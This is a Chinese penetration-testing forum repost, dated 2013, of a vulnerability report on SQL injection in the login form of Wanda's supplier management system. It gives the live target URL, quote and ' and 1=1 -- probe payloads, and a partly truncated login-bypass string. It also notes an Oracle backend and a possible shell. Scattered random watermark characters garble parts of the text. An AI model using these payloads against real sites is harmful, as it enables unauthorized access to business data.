中国网络渗透测试联盟

标题: 万达供应商系统SQL注射漏洞 [打印本页]

作者: admin    时间: 2013-3-24 20:16
标题: 万达供应商系统SQL注射漏洞
简要描述:万达某分站sql注入。敏感信息泄露。
" w' n" ?, F- s- t8 N详细说明:
; P0 Z- J& h1 V% Y1 Y8 ?万达scm系统登陆框sql注入。
+ Y; J* m* m+ b5 M4 s/ R$ @+ \! ?; e: P& b1 x
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
2 V6 _  Y7 Z7 g) l% Z' M- U6 t4 G; e$ U: F  u; ]

: d  u- a3 d, B500错误。
2 S' n, V; f  m  S, w: s' d* c4 k- n! x( G' F) m. t. Z) u
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。0 J. I, Q. g$ l9 W, F$ _* C
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png% I& K, c5 N7 R1 i/ n# ^
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)# |; e# @+ S6 K: g: ]+ B
经过分析,登陆验证的过程应该是:% T" j, {2 W# Q# U' c9 r" x; W
8 |% O. x' J/ U& H/ w0 H8 e
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
7 T1 H! s% P+ W2 `' _( P% _http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png- S0 c) j3 ^: w0 S+ X) `) |

$ d* X- l. B5 d! b1 Xoracle数据库,存在注入点。@大连万达,你怎么看?
% ?9 y  O. I3 U0 \: p- F# lhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png# Y9 d2 {3 P# Y; h3 B3 Y2 x

2 k% l2 b! Q: L' n" I1 |' q8 U系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
7 M& R1 B7 X( X# V7 Z2 A$ R6 @漏洞证明:0 J* a; ?& e* b. y* Q
万达scm系统登陆框sql注入。5 y4 f& y; R% c0 B+ Y2 i

! ~' M1 [6 L( m, w% t) _* @! P5 hhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
$ ^5 E8 s# H! f* v3 D4 @, l6 f' I

- u, X! ]) b1 B, m- k500错误。; R- Q, A. R' g  M* v/ R) ]; X
" L0 d4 U( U: n. y/ A$ ~* x4 Q
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。; F5 Y5 a# \% K* m  Q6 d" \7 S
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png+ `" B- u7 c: N3 z/ }1 }$ N

) \$ q3 y' X. z- p( `0 N9 v  o% O3 I6 ]! i+ @* b8 W; i. }
(截图有一点问题)
+ {5 {# K' j5 I' U& z8 [1 x- c: d+ m" K; M3 O( H
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
! f1 e2 P- H1 a5 y- B! l" ^7 m5 H6 E8 {; N, y: ^& o& W& u
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。5 C; p) w! H2 ~5 g+ [) K' D4 `

" k" g1 ]1 K; i# ^! {# f/ g9 O& {% L绕过:
& C9 }- C" {& A, ?4 I, ihttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1' n. i- _% Q; e8 h; @; n' L

5 [4 G( w  ?' ~" ^& Y" `+ A3 l8 K. g9 n
oracle数据库,存在注入点。@大连万达,你怎么看?
. f2 Z- O: Q9 g1 o- R​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
& b7 u9 ]) Q* u) E0 \! u
& u7 h$ W$ l% Y% w/ x修复方案:
) a5 T9 g, E# c9 }7 m。。。
, W* R) a( t; o6 i" x: p: W/ ?2 ^1 T! J: P2 M0 W
" B* ^: w0 r+ i
厂商已经确认
( D) G$ W" H6 f1 e  \
. z/ R" e" b, v  x) v8 \7 I[/td][/tr]
3 x. x8 s/ V" j[/table]
1 T: @' o4 K$ l7 p; x% ?2 B6 J9 f& S

7 b  H, L* e1 ~9 u4 H9 z




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2